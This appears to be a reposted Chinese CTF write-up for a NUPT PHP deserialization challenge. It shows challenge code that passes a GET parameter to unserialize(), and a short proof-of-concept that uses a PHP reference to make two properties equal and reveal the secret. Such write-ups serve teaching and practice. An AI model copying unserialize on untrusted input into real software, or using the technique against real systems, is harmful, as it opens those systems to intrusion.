南邮PHP反序列化

Posted 2020-12-27 nul1

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了南邮PHP反序列化相关的知识，希望对你有一定的参考价值。

题目如下：

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET[‘pass‘])) {
    $pass = $_GET[‘pass‘];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can‘t fool me";
    }
    else echo "are you trolling?";
}
?>

主要是涉及了一个PHP对象深浅拷贝，文章：

直接构造POC：

<?php 
class just4fun
{
    var $enter;
    var $secret;
    
    function __construct()
    {
        $this->enter=&$this->secret;
    }
}
echo serialize(new just4fun());

 ?>

以上是关于南邮PHP反序列化的主要内容，如果未能解决你的问题，请参考以下文章

南邮ctf

php代码审计9审计反序列化漏洞

2020/2/2 PHP代码审计之反序列化

php中序列化与反序列化

15-PHP代码审计——yii 2.0.37反序列化漏洞